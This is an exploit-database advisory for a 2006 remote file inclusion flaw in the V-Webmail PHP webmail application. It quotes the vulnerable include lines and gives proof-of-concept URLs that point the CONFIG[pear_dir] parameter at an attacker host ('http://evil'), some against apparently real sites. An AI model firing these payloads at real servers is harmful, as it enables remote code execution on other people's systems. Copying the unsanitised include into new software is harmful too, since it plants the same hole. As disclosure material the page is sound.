V-Webmail 1.6.4

vendor:

V-Webmail

by:

beford

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: V-Webmail

Affected Version From: 1.3

Affected Version To: 1.6.4

Patch Exists: YES

Related CWE: N/A

CPE: a:v-webmail:v-webmail

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

V-webmail is a powerful PHP based webmail application with an abundance of features, including many innovative ideas for web applications. The vulnerability exists in the v-webmail/includes/pear/*/*.php and v-webmail/includes/mailaccess/pop3.php files, which allow an attacker to include a remote file by manipulating the CONFIG[pear_dir] parameter. Versions 1.3, 1.5 and 1.6.4 are vulnerable.

Mitigation:

Upgrade to the latest version of V-Webmail.

Source

Exploit-DB raw data:

Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP based webmail application with an
abundance of features, including many innovative ideas for web applications
Discovered: beford <xbefordx gmail com>
Vulnerable File

v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php');
v-webmail/includes/mailaccess/pop3.php =>
require_once($CONFIG['pear_dir'] . 'Net/POP3.php');

Version 1.3
http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil

Version 1.5  - 1.6.4
http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil

# milw0rm.com [2006-05-25]